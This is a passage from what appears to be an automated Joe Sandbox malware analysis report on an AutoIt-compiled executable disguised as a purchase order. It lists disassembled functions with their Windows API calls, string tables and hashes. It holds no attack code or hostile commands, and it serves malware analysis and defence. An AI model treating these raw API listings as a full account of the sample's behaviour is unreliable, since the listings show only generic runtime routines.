                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$Window
                      • String ID: 0
                      • API String ID: 2326795674-4108050209
                      • Opcode ID: 18609db876b0038a9d3356e8a21f61a523fc842ac616cab19169fe16253c1927
                      • Instruction ID: 8162d441dad675f82b40abd5c19ace9c93693767cba471fd027f812c2f10f195
                      • Opcode Fuzzy Hash: 18609db876b0038a9d3356e8a21f61a523fc842ac616cab19169fe16253c1927
                      • Instruction Fuzzy Hash: 3FF1027110430DAFE721DF65CA84BBABBE5FF493A4F044A29F688932A1C774D840DB91
                      Function 00AF6189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                      Download Yara Rule
                      APIs
                      • CharUpperBuffW.USER32(?,?,00B2DBF0), ref: 00AF6245
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                      • API String ID: 3964851224-45149045
                      • Opcode ID: ddaaaa5eff63e1347e6b5cf6936e6a9050491aa9ead72116c30d1a45d8d3ee4d
                      • Instruction ID: 18874fa0ea75c14db6a58331a9ef4dbb2d21705134f08d10051f12147d351720
                      • Opcode Fuzzy Hash: ddaaaa5eff63e1347e6b5cf6936e6a9050491aa9ead72116c30d1a45d8d3ee4d
                      • Instruction Fuzzy Hash: 28C191342042058FCB08EF94C651B7E77E6AF99394F04486CF9869B3D6CB24DD0ACB82
                      Function 00AFD385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetSysColor.USER32(00000012), ref: 00AFD3BE
                      • SetTextColor.GDI32(?,?), ref: 00AFD3C2
                      • GetSysColorBrush.USER32(0000000F), ref: 00AFD3D8
                      • GetSysColor.USER32(0000000F), ref: 00AFD3E3
                      • CreateSolidBrush.GDI32(?), ref: 00AFD3E8
                      • GetSysColor.USER32(00000011), ref: 00AFD400
                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AFD40E
                      • SelectObject.GDI32(?,00000000), ref: 00AFD41F
                      • SetBkColor.GDI32(?,00000000), ref: 00AFD428
                      • SelectObject.GDI32(?,?), ref: 00AFD435
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00AFD454
                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AFD46B
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00AFD480
                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AFD4A8
                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00AFD4CF
                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00AFD4ED
                      • DrawFocusRect.USER32(?,?), ref: 00AFD4F8
                      • GetSysColor.USER32(00000011), ref: 00AFD506
                      • SetTextColor.GDI32(?,00000000), ref: 00AFD50E
                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00AFD522
                      • SelectObject.GDI32(?,00AFD0B5), ref: 00AFD539
                      • DeleteObject.GDI32(?), ref: 00AFD544
                      • SelectObject.GDI32(?,?), ref: 00AFD54A
                      • DeleteObject.GDI32(?), ref: 00AFD54F
                      • SetTextColor.GDI32(?,?), ref: 00AFD555
                      • SetBkColor.GDI32(?,?), ref: 00AFD55F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                      • String ID:
                      • API String ID: 1996641542-0
                      • Opcode ID: 98ced02d9b160f0cba48dd8bd228f6908032334c853de92e43d7a551ca18f8ed
                      • Instruction ID: 2e4238f9b1c9f3323ef2f57c0496be0d818a6ec8069aeee6ccba08ddb8c7bde7
                      • Opcode Fuzzy Hash: 98ced02d9b160f0cba48dd8bd228f6908032334c853de92e43d7a551ca18f8ed
                      • Instruction Fuzzy Hash: EF512C71900218BFDF119FA8DC48EEE7BBAFB48320F508515FA15AB2A1DB759A40DB50
                      Function 00AFB4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00AFB5C0
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AFB5D1
                      • CharNextW.USER32(0000014E), ref: 00AFB600
                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00AFB641
                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00AFB657
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AFB668
                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00AFB685
                      • SetWindowTextW.USER32(?,0000014E), ref: 00AFB6D7
                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00AFB6ED
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AFB71E
                      • _memset.LIBCMT ref: 00AFB743
                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00AFB78C
                      • _memset.LIBCMT ref: 00AFB7EB
                      • SendMessageW.USER32 ref: 00AFB815
                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00AFB86D
                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00AFB91A
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00AFB93C
                      • GetMenuItemInfoW.USER32(?), ref: 00AFB986
                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AFB9B3
                      • DrawMenuBar.USER32(?), ref: 00AFB9C2
                      • SetWindowTextW.USER32(?,0000014E), ref: 00AFB9EA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                      • String ID: 0
                      • API String ID: 1073566785-4108050209
                      • Opcode ID: 96848614ac5805eaa6ef1102937c77c4c36cb7424b8ac3e5f0439b938bb620f2
                      • Instruction ID: 6f1dbce223095ecc4b3cc41a724b0eb16557edcd830eec1ece25cc651ad5c7d3
                      • Opcode Fuzzy Hash: 96848614ac5805eaa6ef1102937c77c4c36cb7424b8ac3e5f0439b938bb620f2
                      • Instruction Fuzzy Hash: 47E1597591021CAFDB219F94CC84EFE7BB8EF05750F108156FA1AAB291DB748A41DF60
                      Function 00AF744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetCursorPos.USER32(?), ref: 00AF7587
                      • GetDesktopWindow.USER32 ref: 00AF759C
                      • GetWindowRect.USER32(00000000), ref: 00AF75A3
                      • GetWindowLongW.USER32(?,000000F0), ref: 00AF7605
                      • DestroyWindow.USER32(?), ref: 00AF7631
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AF765A
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AF7678
                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00AF769E
                      • SendMessageW.USER32(?,00000421,?,?), ref: 00AF76B3
                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00AF76C6
                      • IsWindowVisible.USER32(?), ref: 00AF76E6
                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00AF7701
                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00AF7715
                      • GetWindowRect.USER32(?,?), ref: 00AF772D
                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00AF7753
                      • GetMonitorInfoW.USER32 ref: 00AF776D
                      • CopyRect.USER32(?,?), ref: 00AF7784
                      • SendMessageW.USER32(?,00000412,00000000), ref: 00AF77EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                      • String ID: ($0$tooltips_class32
                      • API String ID: 698492251-4156429822
                      • Opcode ID: 599ea2951b7467b858a2f396b996d2aeedde757869a4ed4ebfc65df6b30689a8
                      • Instruction ID: 338c868e363683a9b6e28cd182664d6c3b323f0139293074de7f12493032396b
                      • Opcode Fuzzy Hash: 599ea2951b7467b858a2f396b996d2aeedde757869a4ed4ebfc65df6b30689a8
                      • Instruction Fuzzy Hash: 96B16B71608345AFDB44DFA8C948B6EBBE5FF88310F00891DF6999B291DB74E805CB91
                      Function 00AD76DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                      Download Yara Rule
                      APIs
                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AD76ED
                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00AD7713
                      • _wcscpy.LIBCMT ref: 00AD7741
                      • _wcscmp.LIBCMT ref: 00AD774C
                      • _wcscat.LIBCMT ref: 00AD7762
                      • _wcsstr.LIBCMT ref: 00AD776D
                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AD7789
                      • _wcscat.LIBCMT ref: 00AD77D2
                      • _wcscat.LIBCMT ref: 00AD77D9
                      • _wcsncpy.LIBCMT ref: 00AD7804
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                      • API String ID: 699586101-1459072770
                      • Opcode ID: e8188af0286b4edc826aa94ebcffb3fe58e570f09551f66e165aba1032a3f8c0
                      • Instruction ID: c1ae0c8fe00f94410c354f565a7dc03c1429377885b31d652f39c0fd4fbef962
                      • Opcode Fuzzy Hash: e8188af0286b4edc826aa94ebcffb3fe58e570f09551f66e165aba1032a3f8c0
                      • Instruction Fuzzy Hash: 40410172A04200BAEB05A7749D47EFF7BECEF15720F44049AF805E3193FB649A40A7A1
                      Function 00AAA756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AAA839
                      • GetSystemMetrics.USER32(00000007), ref: 00AAA841
                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AAA86C
                      • GetSystemMetrics.USER32(00000008), ref: 00AAA874
                      • GetSystemMetrics.USER32(00000004), ref: 00AAA899
                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AAA8B6
                      • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00AAA8C6
                      • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AAA8F9
                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AAA90D
                      • GetClientRect.USER32(00000000,000000FF), ref: 00AAA92B
                      • GetStockObject.GDI32(00000011), ref: 00AAA947
                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAA952
                        • Part of subcall function 00AAB736: GetCursorPos.USER32(000000FF), ref: 00AAB749
                        • Part of subcall function 00AAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00AAB766
                        • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000001), ref: 00AAB78B
                        • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000002), ref: 00AAB799
                      • SetTimer.USER32(00000000,00000000,00000028,00AAACEE), ref: 00AAA979
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                      • String ID: AutoIt v3 GUI
                      • API String ID: 1458621304-248962490
                      • Opcode ID: 493fc18df910c8f6a6df2dad0b65732bdfa7168df14100cb1dae03355a6d4fa4
                      • Instruction ID: 89489342781c269393175b33b23d0c50d1abc7b77f890270bb8df0bccaec8e8a
                      • Opcode Fuzzy Hash: 493fc18df910c8f6a6df2dad0b65732bdfa7168df14100cb1dae03355a6d4fa4
                      • Instruction Fuzzy Hash: 1EB15731A0020AAFDB24DFA8CD85BAE7BF5FB18315F108669FA15A72D0DB74D801CB51
                      Function 00AF352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF3626
                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B2DBF0,00000000,?,00000000,?,?), ref: 00AF3694
                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00AF36DC
                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00AF3765
                      • RegCloseKey.ADVAPI32(?), ref: 00AF3A85
                      • RegCloseKey.ADVAPI32(00000000), ref: 00AF3A92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Close$ConnectCreateRegistryValue
                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                      • API String ID: 536824911-966354055
                      • Opcode ID: 17db6df05b040310f76953627fc106c1fce13c228406e8046542729947fdca36
                      • Instruction ID: 2f6274cb70e81f48cf5cd6fcdace61ae6e64704d4e7403eb4f4ecee6f2010824
                      • Opcode Fuzzy Hash: 17db6df05b040310f76953627fc106c1fce13c228406e8046542729947fdca36
                      • Instruction Fuzzy Hash: B4027C756006019FCB14EF69CA95E2AB7E4FF89320F05845DF98A9B362DB34ED41CB81
                      Function 00AF69C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                      Download Yara Rule
                      APIs
                      • CharUpperBuffW.USER32(?,?), ref: 00AF6A52
                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AF6B12
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BuffCharMessageSendUpper
                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                      • API String ID: 3974292440-719923060
                      • Opcode ID: 4fbc1a87683e9c2325fb907d558555dcdc32a6586e5b078af4a400c6b50ff0cd
                      • Instruction ID: 8b413cd7f9af3604f0bc08d20df0f38349cc4f83262a0afcbb975d78259395cf
                      • Opcode Fuzzy Hash: 4fbc1a87683e9c2325fb907d558555dcdc32a6586e5b078af4a400c6b50ff0cd
                      • Instruction Fuzzy Hash: A1A18E302046059FCB08EF64CA51B7AB3E5FF85364F148969F9A69B2D2DB34ED06CB41
                      Function 00ACDD46 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetClassNameW.USER32(?,?,00000100), ref: 00ACDD87
                      • __swprintf.LIBCMT ref: 00ACDE28
                      • _wcscmp.LIBCMT ref: 00ACDE3B
                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00ACDE90
                      • _wcscmp.LIBCMT ref: 00ACDECC
                      • GetClassNameW.USER32(?,?,00000400), ref: 00ACDF03
                      • GetDlgCtrlID.USER32(?), ref: 00ACDF55
                      • GetWindowRect.USER32(?,?), ref: 00ACDF8B
                      • GetParent.USER32(?), ref: 00ACDFA9
                      • ScreenToClient.USER32(00000000), ref: 00ACDFB0
                      • GetClassNameW.USER32(?,?,00000100), ref: 00ACE02A
                      • _wcscmp.LIBCMT ref: 00ACE03E
                      • GetWindowTextW.USER32(?,?,00000400), ref: 00ACE064
                      • _wcscmp.LIBCMT ref: 00ACE078
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                      • String ID: %s%u
                      • API String ID: 3119225716-679674701
                      • Opcode ID: f05824faebbe2f50181d47a611295da0b0a4279aad61be5d243d5ea324f787f9
                      • Instruction ID: f9a70d6f8a49b6720a8667fe9d51fc8a99eb9151afddc29d1ed9aa620bca9924
                      • Opcode Fuzzy Hash: f05824faebbe2f50181d47a611295da0b0a4279aad61be5d243d5ea324f787f9
                      • Instruction Fuzzy Hash: 90A19A71204706ABD715DF64C884FEAB7E8FF44350F01862EF9AAD6191EB30A945CBD1
                      Function 00ACE69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                      Download Yara Rule
                      APIs
                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00ACE6E1
                      • _wcscmp.LIBCMT ref: 00ACE6F2
                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00ACE71A
                      • CharUpperBuffW.USER32(?,00000000), ref: 00ACE737
                      • _wcscmp.LIBCMT ref: 00ACE755
                      • _wcsstr.LIBCMT ref: 00ACE766
                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00ACE79E
                      • _wcscmp.LIBCMT ref: 00ACE7AE
                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00ACE7D5
                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00ACE81E
                      • _wcscmp.LIBCMT ref: 00ACE82E
                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00ACE856
                      • GetWindowRect.USER32(00000004,?), ref: 00ACE8BF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                      • String ID: @$ThumbnailClass
                      • API String ID: 1788623398-1539354611
                      • Opcode ID: 24d4f8c233c9020b1ec189b95b3f4a4bbee2191ec14d70fe1029866075253d7d
                      • Instruction ID: 66435ec029360c130459caa74fb82ca8fe20fb57ff7fbbbc8b10859b6f14cb23
                      • Opcode Fuzzy Hash: 24d4f8c233c9020b1ec189b95b3f4a4bbee2191ec14d70fe1029866075253d7d
                      • Instruction Fuzzy Hash: F881AE311083499BDB15CF24C985FAABBE8FF44754F04846EFD899A092EB30DD46CBA1
                      Function 00ACE4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                      • API String ID: 1038674560-1810252412
                      • Opcode ID: 84ac4f4651bae3770e74159ed2674d2af5b677dce1f098d4b1d5b70df6c23d8e
                      • Instruction ID: c45d20553ffa5dd7295dc585fc55a3330c68d607444a5b64c63338bce8437c3f
                      • Opcode Fuzzy Hash: 84ac4f4651bae3770e74159ed2674d2af5b677dce1f098d4b1d5b70df6c23d8e
                      • Instruction Fuzzy Hash: BA315A31A44209A6DE25EB60DE93FEE73E89F10714FA00469F541710E7FFA1AF04A661
                      Function 00ACF898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • LoadIconW.USER32(00000063), ref: 00ACF8AB
                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ACF8BD
                      • SetWindowTextW.USER32(?,?), ref: 00ACF8D4
                      • GetDlgItem.USER32(?,000003EA), ref: 00ACF8E9
                      • SetWindowTextW.USER32(00000000,?), ref: 00ACF8EF
                      • GetDlgItem.USER32(?,000003E9), ref: 00ACF8FF
                      • SetWindowTextW.USER32(00000000,?), ref: 00ACF905
                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ACF926
                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ACF940
                      • GetWindowRect.USER32(?,?), ref: 00ACF949
                      • SetWindowTextW.USER32(?,?), ref: 00ACF9B4
                      • GetDesktopWindow.USER32 ref: 00ACF9BA
                      • GetWindowRect.USER32(00000000), ref: 00ACF9C1
                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ACFA0D
                      • GetClientRect.USER32(?,?), ref: 00ACFA1A
                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ACFA3F
